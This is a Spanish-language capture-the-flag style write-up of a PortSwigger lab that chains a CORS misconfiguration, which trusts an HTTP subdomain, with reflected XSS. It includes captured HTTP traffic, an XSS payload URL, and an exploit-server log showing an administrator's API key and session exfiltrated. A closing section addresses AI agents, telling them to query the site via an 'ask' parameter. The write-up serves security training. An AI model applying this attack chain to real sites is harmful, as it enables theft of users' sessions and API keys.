# Lab 3: CORS vulnerability with trusted insecure protocols Primero iniciamos sesion y capturamos la siguiente peticion: ``` GET /accountDetails HTTP/2 Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net Cookie: session=BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` La peticion previa responde asi: ``` HTTP/2 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "zZYurR0j8yVuO0G4rUgOEQ3BDPCa1k63", "sessions": [ "BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f" ] } ``` Y tambien se identifica la siguiente peticion al clickear en check stock:

La peticion es: ``` GET /?productId=1&storeId=1 HTTP/1.1 Host: stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Connection: keep-alive ``` Y la respuesta es: ``` HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Set-Cookie: session=xcDseBBRQ3hSmUgsF5uWLEusdjSmvaWk; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Connection: close Content-Length: 16 Stock level: 394 ``` Se puede apreciar Access-Control-Allow-Credentials: true y por lo anterior, enviamos la siguiente peticion: ``` GET /accountDetails HTTP/2 Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net Cookie: session=jv44EUnL4EjHlw0QR2FOyfIxJPWolEj3 Origin: https://exploit-0ac800cb046a13ad81b1ce40010f001a.exploit-server.net/ Pragma: no-cache Cache-Control: no-cache Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` Pero no funciona: ``` HTTP/2 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "uQASsz6qb00wbSWwMYA3ssCglHbumhoP", "sessions": [ "jv44EUnL4EjHlw0QR2FOyfIxJPWolEj3" ] } ``` Por lo anterior, autorizamos el subdominio: ```bash GET /accountDetails HTTP/2 Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net Origin: http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net Cookie: session=BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` Y con el subdominio si funciono: ```bash HTTP/2 200 OK Access-Control-Allow-Origin: http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "zZYurR0j8yVuO0G4rUgOEQ3BDPCa1k63", "sessions": [ "BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f" ] } ``` Y adicionalmente, se detecta que el aplicativo web stock es susceptible a ataques de XSS: {% code overflow="wrap" %} ```url http://stock.0ace001004cb5c4384df4662009c00d6.web-security-academy.net/?productId=4%3Cscript%3Ealert(2024)%3C/script%3E&storeId=1 ``` {% endcode %}

Teniendo en cuenta lo anterior, se desarrolla el siguiente exploit: ```html ``` En este escenario, el servidor web de `web-security-academy.net` está configurado para confiar en todos los subdominios sin importar el protocolo. Esto significa que cualquier subdominio bajo `web-security-academy.net`, como `stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net`, es automáticamente autorizado a realizar peticiones cross-origin a `0a5000120438c0d181938e1900bb00e7.web-security-academy.net` Y luego de lo anterior, se envia la URL del exploit server a la victima: Se recibe el siguiente Log: {% code overflow="wrap" %} ``` 10.0.4.192 2024-07-02 16:05:48 +0000 "GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22R79v19o3c806LE3uqDV6jWs3LZUDT6nE%22,%20%20%22sessions%22:%20[%20%20%20%20%22Flkp523j6bUAJX1R1BCgm7vamY3aFjc6%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" ``` {% endcode %} Al decodificar en formato URL se obtiene lo siguiente: {% code overflow="wrap" %} ```json { "username": "administrator", "email": "", "apikey": "R79v19o3c806LE3uqDV6jWs3LZUDT6nE", "sessions": ["Flkp523j6bUAJX1R1BCgm7vamY3aFjc6"] } ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/web/cors/lab-3-cors-vulnerability-with-trusted-insecure-protocols.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.